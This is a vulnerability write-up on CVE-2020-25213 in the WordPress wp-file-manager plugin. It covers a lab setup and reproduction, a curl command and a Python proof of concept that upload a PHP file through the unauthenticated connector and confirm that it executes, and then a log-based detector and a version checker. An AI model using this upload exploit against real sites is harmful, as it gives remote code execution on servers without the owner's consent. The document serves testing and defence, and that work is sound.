0x01 Vulnerability Overview
WordPress is a blog platform written in PHP that lets you host a personal blog on a server running PHP and MySQL. The WordPress plugin wp-file-manager, in versions prior to 6.9, contains a security flaw that lets a remote, unauthenticated attacker upload and execute arbitrary PHP code; exploiting it yields arbitrary code execution on the server (CVE-2020-25213).
0x02 Affected Versions
WordPress File Manager (wp-file-manager) plugin, versions 6.0 through 6.8
0x03 Environment Setup
- phpstudy2018
- WordPress
https://wordpress.org/download/
- wp-file-manager version 6.0
https://wordpress.org/plugins/wp-file-manager/advanced/
① Run the WordPress installer
- Installation guide:
https://codex.wordpress.org/zh-cn:%E5%AE%89%E8%A3%85_WordPress
- The WordPress home page after a successful install
- Log in to the admin dashboard and install the wp-file-manager 6.0 plugin
http://YourIP/wordpress/wp-admin/plugin-install.php
Once the plugin is installed, the plugin list looks like this:
http://YourIP/wordpress/wp-admin/plugins.php
0x04 Reproducing the Vulnerability
- Open the connector directly in a browser:
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
If the error shown below is returned, the vulnerability is present.
- Use curl to upload a local file with a POST request:
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
Contents of test.php:
- Open the uploaded file to confirm it executes
Upload path:
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php
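From the defender's side, the three steps above leave a distinctive trail in the web server's access log: a direct request to connector.minimal.php (which bypasses WordPress authentication entirely), a POST to the same file, and then a GET of a .php file under lib/files/. The following added example (not part of the original post) scans Apache/nginx combined-format log lines for that sequence. The sample log lines are constructed and the IP addresses are documentation ranges, not real traffic.

```python
import re
from collections import defaultdict

# Paths from the write-up: the directly reachable connector and the directory uploads land in.
CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic), mirroring the three steps in 0x04.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2020:10:00:01 +0000] "GET /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 123 "-" "curl/7.68.0"
203.0.113.5 - - [10/Sep/2020:10:00:03 +0000] "POST /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 456 "-" "curl/7.68.0"
203.0.113.5 - - [10/Sep/2020:10:00:05 +0000] "GET /wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php HTTP/1.1" 200 789 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Sep/2020:10:01:00 +0000] "GET /wordpress/wp-admin/plugins.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Map one parsed request to a finding kind, or None when it is not of interest."""
    path = rec["path"].split("?", 1)[0]
    if path.endswith(CONNECTOR):
        # Any direct hit on the connector skips WordPress auth; a POST is the upload step.
        return "connector_upload" if rec["method"] == "POST" else "connector_probe"
    if UPLOAD_DIR in path and path.lower().endswith(".php"):
        # Executing a PHP file out of the plugin's upload directory is the final step.
        return "uploaded_php_executed"
    return None


def find_suspicious(log_text):
    """Return {ip: [(timestamp, kind, path), ...]} for every flagged request."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind:
            findings[rec["ip"]].append((rec["ts"], kind, rec["path"]))
    return dict(findings)


def likely_compromised(findings):
    """IPs that both posted to the connector and then fetched a .php from lib/files/."""
    hits = []
    for ip, events in findings.items():
        kinds = {kind for _, kind, _ in events}
        if {"connector_upload", "uploaded_php_executed"} <= kinds:
            hits.append(ip)
    return sorted(hits)


if __name__ == "__main__":
    found = find_suspicious(SAMPLE_LOG)
    for ip, events in found.items():
        for ts, kind, path in events:
            print(f"{ip} {ts} {kind} {path}")
    print("likely compromised:", likely_compromised(found))
```

A single probe of the connector is worth an alert on its own, since legitimate plugin use goes through the WordPress admin and never touches connector.minimal.php directly; the upload-then-execute pair is the high-confidence signal that warrants treating the host as compromised and inspecting lib/files/.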
0x05 Vulnerability POC
# -*- coding:utf-8 -*-
import requests
import json

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/91.0.4472.124 Safari/537.36 "
}
url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"


def Check_1(url):
    # Step 1: request the connector directly; an errUnknownCmd JSON error means it is reachable.
    url_2 = url + url_tail
    res1 = requests.get(url=url_2, headers=headers)
    text1 = res1.text
    text2 = json.loads(text1)
    key = json.dumps(text2)  # convert text2 back to a string for substring matching
    print(text2)
    key1 = "errUnknownCmd"
    if key1 in key:
        print("疑似漏洞存在")
        Next = input("是否进一步验证: Y or N :")
        if Next == "Y":
            Check_2(url)
    else:
        print("漏洞不存在")


def Check_2(url):
    # Step 2: upload phpinfo.php through the connector and fetch it back.
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    url_3 = url + url_tail
    with open('phpinfo.php', 'rb') as fh:
        files = {
            'upload[0]': fh,
        }
        res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
    if res.status_code == requests.codes.ok:
        # print("上传成功!")
        d = res.json()
        added = d.get('added', [])
        if not added:
            print("漏洞不存在!")
            return
        p = added[0].get('url')
        Finally_url = f'{url}{p}'
        res2 = requests.get(url=Finally_url, headers=headers)
        key2 = "PHP Version"
        if key2 in res2.text:
            print("CVE-2020-25213漏洞存在!")
        else:
            print("漏洞不存在!")


def main():
    url_1 = input("输入测试的URL:")
    Check_1(url_1)


if __name__ == '__main__':
    main()
I've only just started learning to write POCs; if anything is wrong, I'd welcome corrections from the experts _(:з」∠)_
0x06 Remediation
Update the wp-file-manager plugin to version 6.9 or later.
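To verify the remediation on a host you administer, two checks are useful: that the installed plugin version is at or above the fixed release, and that nothing executable has already been dropped into lib/files/. The added example below (not code from the original post or from the plugin) parses the standard WordPress plugin header and compares the version against 6.9; the path of the plugin's main file (file_manager.php) is an assumption, and the header text and file list are constructed samples.

```python
import os
import re

# Assumed location of the plugin's main file, which carries the WordPress plugin header.
PLUGIN_MAIN_FILE = "wp-content/plugins/wp-file-manager/file_manager.php"
FIXED_VERSION = (6, 9)  # first release with the fix, per the write-up
UPLOAD_DIR = "/wp-file-manager/lib/files/"

# Constructed sample header in the standard WordPress plugin-header format.
SAMPLE_HEADER = """<?php
/*
Plugin Name: File Manager
Version: 6.0
*/
"""

# Constructed sample of files found under the plugin directory after an incident.
SAMPLE_FILE_LIST = [
    "wp-content/plugins/wp-file-manager/lib/files/test.php",
    "wp-content/plugins/wp-file-manager/lib/files/notes.txt",
    "wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php",
]


def parse_version(header_text):
    """Return the 'Version:' header as a tuple of ints, or None if absent."""
    m = re.search(r'^\s*\*?\s*Version:\s*([0-9][0-9.]*)', header_text, re.M)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).strip('.').split('.'))


def is_vulnerable(version):
    """True when the installed version is below the fixed release (6.9)."""
    return version is not None and version < FIXED_VERSION


def stray_php_files(file_list):
    """PHP files under lib/files/: that directory should hold uploads, never executable code."""
    return sorted(path for path in file_list
                  if UPLOAD_DIR in path and path.lower().endswith(".php"))


def check_install(wp_root):
    """Read the real plugin header if it exists, otherwise fall back to the sample."""
    main_file = os.path.join(wp_root, PLUGIN_MAIN_FILE)
    if os.path.isfile(main_file):
        with open(main_file, encoding="utf-8", errors="replace") as fh:
            header = fh.read(4096)
    else:
        header = SAMPLE_HEADER
    version = parse_version(header)
    return {"version": version, "vulnerable": is_vulnerable(version)}


if __name__ == "__main__":
    result = check_install(".")
    print("installed version:", result["version"], "vulnerable:", result["vulnerable"])
    print("stray PHP under lib/files/:", stray_php_files(SAMPLE_FILE_LIST))
```

Any .php file reported under lib/files/ should be treated as evidence of prior exploitation rather than simply deleted: updating the plugin closes the upload path but does not remove what was already uploaded.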